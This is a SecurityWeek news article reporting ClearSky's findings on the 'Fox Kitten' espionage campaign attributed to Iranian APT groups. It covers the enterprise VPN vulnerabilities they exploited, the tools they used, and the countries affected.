Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Iranian Hackers Exploited Enterprise VPN Flaws in Major Campaign

Infamous Iranian hacking groups APT33 and APT34 appear to have been working together for the past three years to compromise dozens of organizations worldwide, and their attacks involved some of the enterprise VPN vulnerabilities disclosed last year, ClearSky reports.

Infamous Iranian hacking groups APT33 and APT34 appear to have been working together for the past three years to compromise dozens of organizations worldwide, and their attacks involved some of the enterprise VPN vulnerabilities disclosed last year, ClearSky reports.

Believed to be backed by the Iranian government, APT33 (also called Refined Kitten, Elfin, Magnallium and Holmium) and APT34 (also referred to as OilRig and Greenbug) are known for their cyber-espionage activities targeting various entities in the Middle East, the United States, Europe, and Asia.

Since 2017, the two groups likely collaborated as part of an offensive campaign targeted at numerous companies and organizations from the IT, telecommunications, oil and gas, aviation, government, and security sectors around the world, ClearSky says in a new report (PDF).

The activity, which Dragos recently referred to as Parisite and which ClearSky tracks as the Fox Kitten Campaign, also shows connections with APT39 (also tracked as Chafer), an Iran-based group mainly targeting the telecommunications and travel industries.

The campaign, ClearSky says, focused on gaining and maintaining access to the targeted organizations’ networks, stealing valuable information, establishing a long-lasting foothold at the targeted organizations, and breaching additional companies through supply-chain attacks.

Numerous open-source and self-developed offensive tools were used as part of the operation, along with known security flaws in enterprise VPN services from Pulse Secure, Fortinet and Palo Alto Networks.

These vulnerabilities include CVE-2019-11510 (arbitrary file reading in Pulse Secure), CVE-2018-13379 (system file download in Fortinet FortiOS), and CVE-2019-1579 (arbitrary code execution in Palo Alto Networks VPN). The NSA and the UK’s National Cyber Security Centre (NCSC) warned last year that state-sponsored APTs had been exploiting these flaws.

Following the initial compromise, the attackers deploy tools to maintain access — including opening RDP links over SSH tunneling to hide and encrypt traffic — and to download and execute additional malware to establish their foothold in the network.

“The attackers have performed a routine process of identification, examination, and filtering of sensitive, valuable information from every targeted organization. The valuable information was sent back to the attackers for reconnaissance, espionage, or further infection of connected networks,” ClearSky reveals.

Self-developed tools employed in the Fox Kitten campaign include STSRCheck (databases and open ports mapping tool), POWSSHNET (backdoor), VBScript (downloads TXT files from the C&C server and unifies them to a portable executable), a socket-based backdoor, and port.exe (scans predefined ports and IPs).

Open source-based tools the attackers adjusted to their use include Invoke the Hash (PowerShell commands to perform “Pass the Hash” methods), and JuicyPotato (a local privilege escalation tool).

Moreover, the hackers employed seemingly legitimate tools in their attacks, including Ngrok, FRP, Serveo (free command and control protocol), and Putty and Plink (remote services).

ClearSky’s security researchers reveal that, throughout the observed attacks, the hackers did not employ a specific pattern to escalate privileges, steal credentials, move laterally, and ensure persistence.

The main purpose of the campaign, the researchers say, appears to have been information theft. In this regard, the hackers connected through RDP, identified relevant files, and exfiltrated them using POWSSHNET, a socket-based backdoor, and webshells. The hackers also employed three public tools for reverse proxy and SSH forwarding purposes, namely Ngrok, Servo, and FRP.

“The Fox Kitten campaign is a continuous campaign operated, with high probability, by state-sponsored Iranian APT groups whose purpose is espionage against numerous companies mainly in the sectors of IT, defense, electricity, oil and gas and aviation companies,” ClearSky notes.

The researchers observed two main attack waves that compromised companies in Israel, USA, Saudi Arabia, Lebanon, Kuwait, UAE, Australia, France, Poland, Germany, Finland, Hungary, Italy and Austria.

Previously, security researchers revealed connections between various Iran-linked hacking groups, based on the reuse of infrastructure and malicious code, but it appears that the collaborative efforts between at least some of them might run deeper.

“We attribute the ‘Fox Kitten’ campaign, with medium-high confidence, to the APT34 group, and with medium confidence to the APT33 and APT39 groups, and we assess that there is a cooperation between the groups in infrastructure and possible beyond that,” ClearSky’s researchers say.

Related: More Threat Groups Target Electric Utilities in North America

Related: Iranian Hackers Target U.S. Research Organization in Ongoing Campaign

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cyberwarfare

Websites of German airports, administration bodies and banks were hit by DDoS attacks attributed to Russian hacker group Killnet

Cybercrime

The FBI dismantled the network of the prolific Hive ransomware gang and seized infrastructure in Los Angeles that was used for the operation.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

Cybercrime

A new study by McAfee and the Center for Strategic and International Studies (CSIS) named a staggering figure as the true annual cost of...

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.